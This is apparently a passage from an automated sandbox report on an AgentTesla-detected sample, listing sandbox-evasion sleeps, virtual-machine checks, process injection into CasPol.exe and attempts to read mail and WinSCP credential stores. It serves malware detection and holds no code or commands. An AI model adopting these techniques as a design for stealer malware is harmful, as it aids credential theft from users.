Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\e-dekont-20230206.exe TID: 2216 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5604 Thread sleep count: 9564 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -18446744073709540s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1200000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1199781s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1199641s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1199422s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1199297s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1199167s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1199015s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1198906s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1198797s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1198641s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1198531s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1198404s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1198279s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1198171s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1198041s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1197921s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1197813s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1197641s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1197496s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1197390s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1197264s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1197156s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1197031s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1196922s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1196813s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1196641s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1196510s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1196406s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1196288s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1196171s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1196063s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1195953s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1195844s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1195703s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1195593s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1195484s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1195374s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1195265s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1195155s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1195042s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1194922s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1194812s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1194703s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1194593s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1194483s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1194375s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 Thread sleep time: -1194263s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1200000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199422 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199167 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199015 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198797 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198531 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198404 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198279 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198171 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198041 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197921 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197496 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197390 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197264 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197156 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197031 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196922 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196510 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196288 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196171 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196063 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195953 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195844 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195703 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195593 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195484 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195374 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195265 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195155 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195042 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194922 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194703 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194593 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194483 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194263 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9564 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1200000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199422 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199167 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199015 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198797 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198531 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198404 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198279 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198171 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198041 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197921 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197496 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197390 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197264 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197156 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1197031 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196922 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196510 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196288 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196171 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1196063 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195953 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195844 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195703 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195593 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195484 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195374 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195265 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195155 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1195042 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194922 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194703 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194593 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194483 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1194263 Jump to behavior
Source: CasPol.exe, 00000001.00000002.560208417.0000000006252000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42C000 Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42E000 Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F20008 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Queries volume information: C:\Users\user\Desktop\e-dekont-20230206.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
